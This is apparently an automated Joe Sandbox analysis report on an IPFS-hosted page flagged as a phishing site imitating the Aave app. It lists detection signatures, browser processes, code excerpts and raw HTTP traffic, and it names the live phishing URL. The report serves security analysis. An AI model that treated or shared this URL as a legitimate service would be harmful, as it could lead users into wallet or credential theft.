Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/

Overview

General Information

Sample URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
Analysis ID:1521219
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Javascript uses Websockets
Uses IPFS gateway to access IPFS content in browser (often used in phishing/scams)
HTML page contains hidden javascript code
Stores files to the Windows start menu directory
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64
  • chrome.exe (PID: 4084 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 1076 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1956,i,1385837072014725862,5014382410172538292,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 1196 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6488 --field-trial-handle=1956,i,1385837072014725862,5014382410172538292,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6624 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6456 --field-trial-handle=1956,i,1385837072014725862,5014382410172538292,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6656 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/SlashNext: detection malicious, Label: Fraudulent Website type: Phishing & Social Engineering

Phishing

barindex
Source: https://discord.com/invite/aaveHTTP Parser: !function(){if(null!=window.websocket){if(function(n){try{var o=localstorage.getitem(n);return null==o?null:json.parse(o)}catch(n){return null}}("token")&&!window.__overlay__){var n=null!=window.discordnative||null!=window.require?"etf":"json",o=window.global_env.gateway_endpoint+"/?encoding="+n+"&v="+window.global_env.api_version;null!=window.discordnative&&void 0!==window.uint8array&&void 0!==window.textdecoder?o+="&compress=zstd-stream":void 0!==window.uint8array&&(o+="&compress=zlib-stream"),console.log("[fast connect] "+o+", encoding: "+n+", version: "+window.global_env.api_version);var e=new websocket(o);e.binarytype="arraybuffer";var i=date.now(),w={open:!1,identify:!1,gateway:o,messages:[]};e.onopen=function(){console.log("[fast connect] connected in "+(date.now()-i)+"ms"),w.open=!0},e.onclose=e.onerror=function(){window._ws=null},e.onmessage=function(n){w.messages.push(n)},window._ws={ws:e,state:w}}}}()
Source: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/markets/HTTP Parser: Gateway: dweb.link
Source: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/HTTP Parser: Gateway: dweb.link
Source: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkHTTP Parser: Gateway: dweb.link
Source: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/staking/HTTP Parser: Gateway: dweb.link
Source: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/HTTP Parser: Gateway: dweb.link
Source: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/HTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 8 8" shape-rendering="optimizeSpeed" width="64" height="64"><path fill="hsl(33 54% 12%)" d="M0,0H8V8H0z"/><path fill="hsl(0 40% 8%)" d="M1,0h1v1h-1zM6,0h1v1h-1zM3,0h1v1h-1zM4,0h1v1h-1zM1,1h1v1h-1zM6,1h1...
Source: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/pages/_app-c0d18763a38243f4.jsHTTP Parser: (self.webpackchunk_n_e=self.webpackchunk_n_e||[]).push([[2888],{20846:function(e,t,n){"use strict";n.d(t,{w:function(){return s}});var r=n(64146),a=n(8198);const i=[{inputs:[{internaltype:"address",name:"stkaave",type:"address"},{internaltype:"address",name:"ethusdpricefeed",type:"address"},{internaltype:"address",name:"aaveusdpricefeed",type:"address"}],statemutability:"nonpayable",type:"constructor"},{inputs:[],name:"aave_usd_price_feed",outputs:[{internaltype:"address",name:"",type:"address"}],statemutability:"view",type:"function"},{inputs:[],name:"eth_usd_price_feed",outputs:[{internaltype:"address",name:"",type:"address"}],statemutability:"view",type:"function"},{inputs:[],name:"staked_aave",outputs:[{internaltype:"address",name:"",type:"address"}],statemutability:"view",type:"function"},{inputs:[{internaltype:"address",name:"stakedasset",type:"address"},{internaltype:"address",name:"oracle",type:"address"}],name:"getstakedassetdata",outputs:[{components:[{internaltype:"uint256",name:"stakedtokentotalsu...
Source: https://app.aave.com/_next/static/chunks/pages/_app-59c4c0609aba862f.jsHTTP Parser: (self.webpackchunk_n_e=self.webpackchunk_n_e||[]).push([[2888],{20846:function(e,t,n){"use strict";n.d(t,{w:function(){return s}});var r=n(64146),a=n(8198);const i=[{inputs:[{internaltype:"address",name:"stkaave",type:"address"},{internaltype:"address",name:"ethusdpricefeed",type:"address"},{internaltype:"address",name:"aaveusdpricefeed",type:"address"}],statemutability:"nonpayable",type:"constructor"},{inputs:[],name:"aave_usd_price_feed",outputs:[{internaltype:"address",name:"",type:"address"}],statemutability:"view",type:"function"},{inputs:[],name:"eth_usd_price_feed",outputs:[{internaltype:"address",name:"",type:"address"}],statemutability:"view",type:"function"},{inputs:[],name:"staked_aave",outputs:[{internaltype:"address",name:"",type:"address"}],statemutability:"view",type:"function"},{inputs:[{internaltype:"address",name:"stakedasset",type:"address"},{internaltype:"address",name:"oracle",type:"address"}],name:"getstakedassetdata",outputs:[{components:[{internaltype:"uint256",name:"stakedtokentotalsu...
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49756 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/css/0da2d62e1a58e826.css HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7603.58cb27010e0a12d8.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1320.f9a83bb87b7294af.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7888.4670beb870221fb5.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/797.224fdb0a57599ef0.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/Inter-Regular.f1f0c35b.woff2 HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/css/0da2d62e1a58e826.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/media/Inter-SemiBold.fcb100c7.woff2 HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/css/0da2d62e1a58e826.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/media/Inter-Medium.dc792b50.woff2 HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/css/0da2d62e1a58e826.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/media/Inter-Bold.579e0f95.woff2 HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/css/0da2d62e1a58e826.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /aaveLogo.svg HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /icons/networks/ethereum.svg HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6782.5dfef7893dd5bea4.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/3652.76d2fc48524771f4.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1497.8e36954048946218.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9689.adbfca89f0e04259.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8977.8cefff53c53bdda4.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8420.5efc2099f7e56f19.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/330.182af63f38cc0e3d.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
